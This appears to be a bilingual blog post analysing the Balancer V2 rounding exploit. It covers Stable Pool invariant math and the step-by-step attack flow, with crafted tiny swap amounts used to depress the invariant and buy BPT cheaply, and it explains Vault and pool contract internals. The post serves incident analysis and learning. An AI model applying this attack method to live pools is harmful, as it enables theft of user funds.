D$。这表明在锚定价格附近，池子的行为接近常和模型，价格曲线几乎线性，滑点极小，对应高流动性与价格稳定区域。</li><li><strong>某个代币余额趋近于零</strong>：例如 $x_k \to 0$，则有 $P = \prod_{i=1}^{n} x_i \to 0$，此时项$\frac{D^{n+1}}{n^{n} P}$变得极大并主导整个等式，使其近似满足$D^{n+1} \propto P$，从而在边界区域退化为类似常积模型的行为，价格随交易量急剧变化，滑点迅速增大，有效阻止单一资产被完全抽空。</li></ul><p>上面 <code>_calculateInvariant</code>函数里不变量公式的<strong>自变量为各个代币的余额，因变量为不变量 D。</strong> 这里为了计算出 D，<code>_calculateInvariant</code> 函数使用 Newton–Raphson 迭代公式 $D_{k+1} = D_k - \frac{f(D_k)}{f’(D_k)}$ 进行最多 256 次迭代来计算出 D 值，更具体的数学细节就不展开了，感兴趣的可以找 ChatGPT 老师做更多解释。</p><p>在计算出不变量 D 之后，<code>_calcInGivenOut</code> 函数基于上述不变量公式进行变换，得到以下新公式 $x^2 + \left( S_{\setminus x} + \frac{D}{A \cdot n^n} - D \right) x - \frac{D^{,n+1}}{A \cdot n^{2n} \cdot P_{\setminus x}} = 0$并尝试求解变量 x。其中：</p><ul><li>$x$ ：表示当 tokenIn 流入之后 <strong>tokenIn 的新余额 (即$x=B_x + Amout_{in}$</strong>，而这个$Amount_{in}$就是 <code>_calcInGivenOut</code> 最终要求的值)。<strong>待计算的值</strong>。</li><li>$S_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总和。</li><li>$P_{\setminus x}$：表示除了 tokenX 以外剩余其他 token 余额的总积。</li></ul><p>这样，在计算出 tokenIn 的预期新余额之后，减去当前余额就能得到期望用户输入的 tokenIn 代币数 $Amout_{in}$。</p><p><strong>那么 BPT 的价格该如何计算呢？</strong> 看得出来 <strong>BPT 的价格与不变量 D 是正相关</strong>的，符合 $P_{BPT} = \frac{D}{S_{BPT}}$，其中$P_{BPT}$ 为 BPT 的价格，$S_{BPT}$ 为 BPT 的总供应量。但是要注意，虽然D名为不变量，但它并不代表是一成不变的，详见底下的代码注释，这里不再展开。</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function returns the appreciation of BPT relative to the underlying tokens, as an 18 decimal fixed</span></span><br><span class="line"><span class="comment"> * point number. It is simply the ratio of the invariant to the BPT supply.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * The total supply is initialized to equal the invariant, so this value starts at one. During Pool operation the</span></span><br><span class="line"><span class="comment"> * invariant always grows and shrinks either proportionally to the total supply (in scenarios with no price impact,</span></span><br><span class="line"><span class="comment"> * e.g. proportional joins), or grows faster and shrinks more slowly than it (whenever swap fees are collected or</span></span><br><span class="line"><span class="comment"> * the token rates increase). Therefore, the rate is a monotonically increasing function *as long as the tokens</span></span><br><span class="line"><span class="comment"> * in the pool do not lose value*.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * ...</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">getRate</span>(<span class="params"></span>) external view virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// We need to compute the current invariant and actual total supply. The latter includes protocol fees that have</span></span><br><span class="line">    <span class="comment">// accrued but are not yet minted: in calculating these we&#x27;ll actually end up fetching most of the data we need</span></span><br><span class="line">    <span class="comment">// for the invariant.</span></span><br><span class="line"></span><br><span class="line">    (</span><br><span class="line">        uint256[] memory balances,</span><br><span class="line">        uint256 virtualSupply,</span><br><span class="line">        uint256 protocolFeeAmount,</span><br><span class="line">        uint256 lastJoinExitAmp,</span><br><span class="line">        uint256 currentInvariantWithLastJoinExitAmp</span><br><span class="line">    ) = <span class="title function_">_getSupplyAndFeesData</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Due protocol fees will be minted at the next join or exit, so we can simply add them to the current virtual</span></span><br><span class="line">    <span class="comment">// supply to get the actual supply.</span></span><br><span class="line">    uint256 actualTotalSupply = virtualSupply.<span class="title function_">add</span>(protocolFeeAmount);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// All that&#x27;s missing now is the invariant. We have the balances required to calculate it already, but still</span></span><br><span class="line">    <span class="comment">// need the current amplification factor.</span></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// It turns out that the process for due protocol fee calculation involves computing the current invariant,</span></span><br><span class="line">    <span class="comment">// except using the amplification factor at the last join or exit. This would typically not be terribly useful,</span></span><br><span class="line">    <span class="comment">// but since the amplification factor only changes rarely there is high probability of its current value being</span></span><br><span class="line">    <span class="comment">// the same as it was in the last join or exit. If that is the case, then we can skip the costly invariant</span></span><br><span class="line">    <span class="comment">// computation altogether.</span></span><br><span class="line">    uint256 currentInvariant = (currentAmp == lastJoinExitAmp)</span><br><span class="line">        ? currentInvariantWithLastJoinExitAmp</span><br><span class="line">        : <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// With the current invariant and actual total supply, we can compute the rate as a fixed-point number.</span></span><br><span class="line">    <span class="keyword">return</span> currentInvariant.<span class="title function_">divDown</span>(actualTotalSupply);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="3-攻击流程">3. 攻击流程</h3><p>在第一小节里我们提到了如果传入了一个极小值给 _upscale 函数，那么其计算结果会出现较大的精度损失，但我们仍然还<strong>没搞清楚是如何通过这个几 wei 的极小值来窃取大额资金</strong>的。第二小节里我们详细了解了 Stable Pool 的不变量公式以及 BPT 价格的计算方式。</p><p>回顾一下：</p><ol><li>Stable Pool 的数学模型表现为常和与常积的结合，即在锚定价格附近表现为 x + y = k，<strong>偏离锚定价格较远的位置则表现为 x * y = k</strong>。</li><li>不变量D的计算是通过各个 token 的 balance 来得到的，那么<strong>不变量 D 一定和各个 token 的 balance 呈正相关</strong>。这个很容易证明，当有 LP 注入流动性的时候 token balance 增加，那么 D 也要增加以对应新增发的 BPT，反之如果 LP 撤离流动性则 token balance 降低，D 也应该随之变小。</li><li><strong>BPT 价格是由不变量 D 和当前总供应量得到</strong>。在总供应量不变的情况下如果能通过漏洞把 D 降低那么就能以比正常价格低的价格来兑换 BPT。</li></ol><p>那么攻击思路就开始逐渐清晰了：<strong>在每次 Swap 时，不变量 D 的计算都是由 token balance 来计算得到。如果能通过这种细微的 token balance 计算的精度丢失，使得不变量 D 的计算被压小（在 BPT 总供应量不变的前提下），那么攻击者就可以以较低的价格来购买 BPT，因为 BPT 价格受到不变量 D 的直接影响</strong>。</p><p><a href="https://app.blocksec.com/explorer/tx/arbitrum/0x7da32ebc615d0f29a24cacf9d18254bea3a2c730084c690ee40238b1d8b55773">Arbitrum 上的示例攻击交易</a>展示了攻击的全流程，我们可以发现攻击者正是通过 _upscale 函数精度损失，使得 D 的计算偏离正常值，进而影响 BPT 价格来进行攻击。具体来说，攻击的流程是这样的。</p><ol><li><p><strong>流动性操纵</strong>。Balancer batchSwap 允许临时借用内部余额，因此攻击者首先借用了 Balancer 中该 Pool 的 BPT，进而使用这些 BPT 去换取底层的 rETH/cbETH/wstETH 等资产代币。使得这些本来余额为 1e18 数量级的代币，在经过大量兑换之后池子里只剩下 1e11 级别的数量：</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image.png" alt="image.png"></p><p>上图中 TokenIn 为 <code>wstETH/rETH/cbETH</code> 的这个其实就是该池子的 BPT（因为 BPT 的地址就是该池子的地址）。从图上可以看到从上到下每次兑换底层资产的数量级依次递减，直到最后 swap 的数量低于 100wei。从余额变动来看，最开始进行 swap 时代币的数量分别为：</p><ul><li><strong>cbETH: 385e18</strong> (385,331,897,945,415,101,145)</li><li><strong>BPT: 2.45e18</strong> + 2^11 (2,596,148,429,267,416,263,499,288,948,276,786)</li><li><strong>wstETH: 36.4e18</strong> (36,378,350,238,858,588,950)</li><li><strong>rETH: 41.3e18</strong> (41,301,528,246,890,260,702)</li></ul><blockquote><p>注：BPT 余额中 2^11 部分为 <code>_PREMINTED_TOKEN_BALANCE</code>，详见代码。</p></blockquote><p>而在完成流动性操纵之后最终的代币数量分别为：</p><ul><li><strong>cbETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>BPT: 501.96e18</strong> + 2^11 (2,596,148,429,267,915,775,463,860,923,420,341)</li><li><strong>wstETH: 1.00e11</strong> (100,000,000,000)</li><li><strong>rETH: 1.00e11</strong> (100,000,000,000)</li></ul></li><li><p>通过舍入漏洞频繁压低不变量 D。这一步骤只涉及到 wstETH/cbETH 交易。攻击者通过重复多次以下 swap 步骤来达到目的：</p><ol><li>wstETH→cbETH: 这一步将耗尽 wstETH 流动性，使得流动性从较高的 1e11 降低为 9 这个临界值。</li><li><strong>wstETH→cbETH: 这一步使用精心构建的 amount = 8， 触发 upscale 的精度损失。</strong> 此时 cbETH 的 token rate 为 1.114。因此在计算不变量 D 之前，upscale 会计算 <code>balance(8) * rate(1.114) = value(8.912)</code> 并截断为 <strong>8</strong>。这样一来，在计算不变量 D 时，由于使用的 token balance 为截断后的 value，因此所计算出来的 D 的值将会被恶意下压。</li><li>cbETH→wstETH: 在完成上一步的步骤将 D 向下压缩之后，这一步的 swap 只是将 wstETH 的流动性从 1 恢复为例如 5642 这种较高值，以准备下一次执行 a 步骤。</li></ol><p><img src="/2025/11/balancer-128m-exploit-analysis/image%201.png" alt="image.png"></p></li><li><p>由于已经通过多次舍入攻击把不变量 D 压的很小，因此攻击者可以以较低价格来回购 BPT，用以偿还从 Vault 的 batchSwap 里借用的内部余额。而 BPT 的前后价格差就是攻击者窃取金额的关键。下图展示了攻击者花费底层代币 cbETH/wstETH/rETH 回购 BPT 的交易过程，这里攻击者每次回购 BPT 的数量呈指数级上升，用于快速回购回最开始从 Vault 借入的用于枯竭掉 Pool 流动性所花费的 BPT。</p><p><img src="/2025/11/balancer-128m-exploit-analysis/image%202.png" alt="image.png"></p></li></ol><h2 id="四、参考链接">四、参考链接</h2><ol><li><a href="https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/">https://www.coinspect.com/blog/balancer-rate-manipulation-exploit/</a></li><li><a href="https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437">https://blocksecteam.medium.com/in-depth-analysis-the-balancer-v2-exploit-9552f6442437</a></li><li><a href="https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit">https://www.openzeppelin.com/news/understanding-the-balancer-v2-exploit</a></li><li><a href="https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw">https://mp.weixin.qq.com/s/zywPIK08hpy-Ug6rc9Qysw</a></li><li><a href="https://x.com/Balancer/status/1986104426667401241">https://x.com/Balancer/status/1986104426667401241</a></li></ol></div><div id="content-en" class="lang-content lang-content-en" style="display: none;"><h2 id="I-Introduction">I. Introduction</h2><p><strong>On November 3, 2025, attackers exploited arithmetic precision loss in Balancer pool invariant calculations, stealing $128 million from six blockchain networks in less than 30 minutes.</strong> I found this attack very interesting, but most existing online articles describe extremely limited technical details, such as precision loss in the _upscaleArray logic or adjacent one or two layers of the call chain, which is not very friendly to readers who are not yet familiar with Balancer’s specific details. Therefore, I wanted to organize all the relevant details comprehensively and take this opportunity to learn about the Balancer protocol.</p><h2 id="II-Balancer-Internal">II. Balancer Internal</h2><p>In a nutshell: Balancer is a DeFi liquidity pool framework centered around <strong>Automated Market Makers (AMM)</strong>. Does it feel like saying nothing? Don’t worry, let’s understand it step by step.</p><h3 id="1-What-is-an-AMM">1. What is an AMM</h3><p>What is an Automated Market Maker (AMM)? Let’s first understand what a market maker is. <strong>A Market Maker is a role that provides liquidity</strong>. For example, in stock trading, if there’s a huge gap between the bid and ask prices for a particular asset, it’s unfavorable for users to buy or sell, as large spreads can prevent trading at appropriate prices, leading to additional capital losses. Market makers provide liquidity by frequently placing orders in the order book to reduce the gap between buy and sell prices. If you’ve traded US stock options, you’ll particularly understand this, as options have poor liquidity due to their special nature, so most liquidity in the order book is provided by market makers.</p><p>For cryptocurrencies, similar problems arise in currency conversion. If users want to trade large amounts of their tokens, they need to find a place that can handle all their trades. The well-known Uniswap V2 is a classic example. It holds large amounts of TokenA/TokenB pairs and calculates token exchange prices by maintaining the <code>x * y = k</code> invariant. For example, if Uniswap’s k = 20,000 and currently holds 1000 USDC and 20 ETH, then the ETH/USDC exchange rate is 50. If the token amounts in Uniswap change to 2000 USDC and 10 ETH (note that k remains unchanged), then the ETH/USDC exchange rate becomes 200. You can see that trading venues like Uniswap automatically adjust their trading prices based on mathematical formula calculations, hence they are automated market makers. <strong>An Automated Market Maker is a role that can both automatically adjust prices based on market conditions and provide sufficient token liquidity to meet trading needs</strong>.</p><h3 id="2-Balancer-Components">2. Balancer Components</h3><p>The <a href="https://docs-v2.balancer.fi/concepts/pools/">Balancer V2 documentation</a> describes that Balancer mainly consists of two parts: Vault and Pools. Vault and Pools have a one-to-many relationship, so if users are involved in trading operations between multiple tokens, they only need to update accounting in the Vault, reducing redundant transfers and lowering gas costs.</p><p><strong>Vault</strong></p><p>The Vault (pkg/vault/contracts/Vault.sol) is the core of Balancer. It <strong>holds</strong> and <strong>manages</strong> all tokens in each Balancer pool and is also the entry point for most Balancer operations (swaps / joins / exits). However, it’s important to note that while the Vault holds tokens and maintains accounting, it does not perform specific fund management (for example, logic such as maintaining AMM invariants is not done in the vault). This logic is handled in Pools.</p><p><strong>Pools</strong></p><p>There are many different types of pools in Balancer. Here are a few simple or commonly used ones:</p><ul><li><strong>Linear Pool</strong>: Uses known and stable exchange rates to allow swapping between base assets and their wrapped yield tokens. For example, in Aave, stablecoin DAI and aDAI (which represents deposits and continuously accrues interest after depositing DAI into Aave) can be efficiently swapped through a Linear Pool.</li><li><strong>Weight Pool</strong>: An extended version of the classic constant product market-making model (x · y = k) popularized by Uniswap V1.</li><li><strong>Composable Stable Pools</strong>: Liquidity pools designed for a set of assets that are highly correlated in value and expected to exchange stably at near 1:1 ratios or through known exchange rates. For example, trading between stablecoins like USDC, USDT, and DAI, which have minimal price volatility, making them very suitable for matching with low-slippage stable curves.</li></ul><p>Regarding <strong>Composable Stable Pools</strong>, note the following:</p><ol><li>This scenario differs from Linear Pool’s purpose: Composable Stable Pool handles exchanges between “<strong>multiple mutually equivalent stable assets</strong>”, while Linear Pool handles exchanges between “<strong>base assets and their yield tokens</strong>”. The two have significantly different mathematical structures and application scenarios.</li><li>Composable means that the pool’s BPT (Balancer Pool Token, the ERC20 share proof that liquidity providers receive after depositing assets into the pool) <strong>can itself participate as a composable asset in the construction of other pools</strong>. In other words, the pool’s LP tokens can be nested into higher-level pools like regular tokens, allowing different pools to freely combine, reference each other, and together form larger-scale, more capital-efficient liquidity structures. Although Linear Pool also registers its BPT to the Vault, these BPTs may not be used as composable assets to build other Pools.</li></ol><h3 id="3-Balancer-Interaction-Flow">3. Balancer Interaction Flow</h3><p>Here we use the Vault + Composable Stable Pools combination as an example to introduce some of Balancer’s interaction flows.</p><p><strong>Creating Composable Stable Pool Contracts</strong></p><p>Let’s first look at what interaction flow occurs between the vault and pool when creating a pool, and what state variables are involved:</p><ol><li><p>To create a new <strong>Composable Stable Pool</strong>, users can freely call the create function of the ComposableStablePoolFactory contract (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol) to create a new ComposableStablePool contract.</p></li><li><p>The ComposableStablePool constructor will then automatically call vault.registerPool and vault.registerTokens to register this pool and related tokens into the vault. Note that the related tokens here include not only the underlying assets specified during registration but also the pool address itself (because the pool is its own BPT).</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="title function_">constructor</span>(<span class="params">NewPoolParams memory params</span>)</span><br><span class="line">    <span class="title class_">BasePool</span>(</span><br><span class="line">        params.<span class="property">vault</span>,</span><br><span class="line">        <span class="title class_">IVault</span>.<span class="property">PoolSpecialization</span>.<span class="property">GENERAL</span>,</span><br><span class="line">        params.<span class="property">name</span>,</span><br><span class="line">        params.<span class="property">symbol</span>,</span><br><span class="line">        <span class="title function_">_insertSorted</span>(params.<span class="property">tokens</span>, <span class="title class_">IERC20</span>(<span class="variable language_">this</span>)), <span class="comment">// &lt;------</span></span><br><span class="line">        <span class="keyword">new</span> address[](params.<span class="property">tokens</span>.<span class="property">length</span> + <span class="number">1</span>), <span class="comment">// &lt;------</span></span><br><span class="line">        params.<span class="property">swapFeePercentage</span>,</span><br><span class="line">        params.<span class="property">pauseWindowDuration</span>,</span><br><span class="line">        params.<span class="property">bufferPeriodDuration</span>,</span><br><span class="line">        params.<span class="property">owner</span></span><br><span class="line">    )</span><br><span class="line">    <span class="title class_">StablePoolAmplification</span>(params.<span class="property">amplificationParameter</span>)</span><br><span class="line">    <span class="title class_">ComposableStablePoolStorage</span>(<span class="title function_">_extractStorageParams</span>(params))</span><br><span class="line">    <span class="title class_">ComposableStablePoolRates</span>(<span class="title function_">_extractRatesParams</span>(params))</span><br><span class="line">    <span class="title class_">ProtocolFeeCache</span>(</span><br><span class="line">        params.<span class="property">protocolFeeProvider</span>,</span><br><span class="line">        <span class="title class_">ProviderFeeIDs</span>(&#123; <span class="attr">swap</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">SWAP</span>, <span class="attr">yield</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">YIELD</span>, <span class="attr">aum</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">AUM</span> &#125;)</span><br><span class="line">    )</span><br><span class="line">&#123;</span><br><span class="line">    _version = params.<span class="property">version</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    IVault vault,</span></span><br><span class="line"><span class="params">    IVault.PoolSpecialization specialization,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) private <span class="title function_">returns</span> (bytes32) &#123;</span><br><span class="line">    bytes32 poolId = vault.<span class="title function_">registerPool</span>(specialization);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We don&#x27;t need to check that tokens and assetManagers have the same length, since the Vault already performs</span></span><br><span class="line">    <span class="comment">// that check.</span></span><br><span class="line">    vault.<span class="title function_">registerTokens</span>(poolId, tokens, assetManagers);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Let’s mention <strong>PoolSpecialization</strong> here. It determines the callback interface form that the Vault uses when calling the pool for swaps, thus affecting the pool’s gas costs and supported functionality:</p><ul><li>General type is the most flexible, suitable for pools that need access to all token balances and complex mathematical logic.</li><li>Minimal Swap Info reduces callback data while maintaining functionality, commonly used for AMMs like Weight Pool that don’t need full state.</li><li>Two Token further restricts the pool to contain only two assets in exchange for the lowest swap gas cost.</li></ul><p>Different types of pools choose appropriate specializations to balance functionality and performance based on their invariant calculation requirements and expected swap complexity. Each pool hardcodes the PoolSpecialization parameter in its constructor. In ComposableStablePool, PoolSpecialization is set to <strong>GENERAL</strong>.</p></li><li><p>When the Vault receives function calls from a General Pool, it performs some calculations and state updates. One is in the registerPool function, where the vault calculates a unique pool ID for this pool and stores it in the _isPoolRegistered variable:</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolRegistry.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerPool</span>(<span class="params">PoolSpecialization specialization</span>)</span><br><span class="line">    external</span><br><span class="line">    override</span><br><span class="line">    nonReentrant</span><br><span class="line">    whenNotPaused</span><br><span class="line">    <span class="title function_">returns</span> (bytes32)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Each Pool is assigned a unique ID based on an incrementing nonce. This assumes there will never be more than</span></span><br><span class="line">    <span class="comment">// 2**80 Pools, and the nonce will not overflow.</span></span><br><span class="line"></span><br><span class="line">    bytes32 poolId = <span class="title function_">_toPoolId</span>(msg.<span class="property">sender</span>, specialization, <span class="title function_">uint80</span>(_nextPoolNonce));</span><br><span class="line"></span><br><span class="line">    <span class="title function_">_require</span>(!_isPoolRegistered[poolId], <span class="title class_">Errors</span>.<span class="property">INVALID_POOL_ID</span>); <span class="comment">// Should never happen as Pool IDs are unique.</span></span><br><span class="line">    _isPoolRegistered[poolId] = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    _nextPoolNonce += <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note that msg.sender is the pool&#x27;s contract</span></span><br><span class="line">    emit <span class="title class_">PoolRegistered</span>(poolId, msg.<span class="property">sender</span>, specialization);</span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The other is in the registerTokens function, which sets <code>_poolAssetManagers</code> and <code>_generalPoolsBalances</code> respectively. Both use <code>&lt;poolId, token&gt;</code> as the key to store data. The former represents the administrator address that can manipulate the deposit/withdrawal/setting of balances for a token within the Pool, while the latter represents the <strong>balance state</strong> of a token in the Pool from the vault’s perspective. Therefore, we can see here that it is indeed the vault that stores the quantity information of each token in the Pool, which also facilitates swap exchanges.</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolTokens.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) external override nonReentrant whenNotPaused <span class="title function_">onlyPool</span>(<span class="params">poolId</span>) &#123;</span><br><span class="line">    <span class="title class_">InputHelpers</span>.<span class="title function_">ensureInputLengthMatch</span>(tokens.<span class="property">length</span>, assetManagers.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Validates token addresses and assigns Asset Managers</span></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="title class_">IERC20</span> token = tokens[i];</span><br><span class="line">        <span class="title function_">_require</span>(token != <span class="title class_">IERC20</span>(<span class="number">0</span>), <span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line"></span><br><span class="line">        _poolAssetManagers[poolId][token] = assetManagers[i];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title class_">PoolSpecialization</span> specialization = <span class="title function_">_getPoolSpecialization</span>(poolId);</span><br><span class="line">    <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">TWO_TOKEN</span>) &#123;</span><br><span class="line">        <span class="title function_">_require</span>(tokens.<span class="property">length</span> == <span class="number">2</span>, <span class="title class_">Errors</span>.<span class="property">TOKENS_LENGTH_MUST_BE_2</span>);</span><br><span class="line">        <span class="title function_">_registerTwoTokenPoolTokens</span>(poolId, tokens[<span class="number">0</span>], tokens[<span class="number">1</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">MINIMAL_SWAP_INFO</span>) &#123;</span><br><span class="line">        <span class="title function_">_registerMinimalSwapInfoPoolTokens</span>(poolId, tokens);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// PoolSpecialization.GENERAL</span></span><br><span class="line">        <span class="title function_">_registerGeneralPoolTokens</span>(poolId, tokens); <span class="comment">// &lt;-------</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    emit <span class="title class_">TokensRegistered</span>(poolId, tokens, assetManagers);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/vault/contracts/balances/GeneralPoolsBalance.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerGeneralPoolTokens</span>(<span class="params">bytes32 poolId, IERC20[] memory tokens</span>) internal &#123;</span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[poolId];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="comment">// EnumerableMaps require an explicit initial value when creating a key-value pair: we use zero, the same</span></span><br><span class="line">        <span class="comment">// value that is found in uninitialized storage, which corresponds to an empty balance.</span></span><br><span class="line">        bool added = poolBalances.<span class="title function_">set</span>(tokens[i], <span class="number">0</span>);</span><br><span class="line">        <span class="title function_">_require</span>(added, <span class="title class_">Errors</span>.<span class="property">TOKEN_ALREADY_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>At this point, we must mention the data storage format of <code>Pool Balances</code> in the vault. The balance information stored in <code>_generalPoolsBalances</code> for each pool on a token is represented as bytes32, which contains three fields:</p><ul><li><code>cash</code> 112 bits, representing the amount of tokens currently stored in the Vault for this Pool</li><li><code>managed</code> 112 bits, representing the amount of tokens withdrawn from the Vault by the Pool’s Asset Manager and held externally</li><li><code>lastChangeBlock</code> 32 bits, representing the block number of the last balance change, used to prevent sandwich attacks</li></ul><p>The core purpose of this design is to allow liquidity to earn higher returns while maintaining normal AMM operation. In the early Uniswap model, to maintain x·y = k, most liquidity had to be locked inside the contract, making it impossible to perform any external investments and thus unable to generate additional returns. Balancer’s architecture allows Asset Managers to withdraw some funds from the Vault for lending, investment, or other yield strategies. The Pool’s total balance still equals <code>total = cash + managed</code>, but the managed portion can be flexibly utilized to earn additional returns; only when events like swap, join, or exit occur will the <code>cash</code> amount stored in the Vault be updated. This ensures both AMM availability and improved overall capital efficiency.</p></li></ol><p><strong>Adding Liquidity</strong></p><p>When a Liquidity Provider (LP) wants to add liquidity to a Pool, the LP can inject funds by calling the joinPool function on 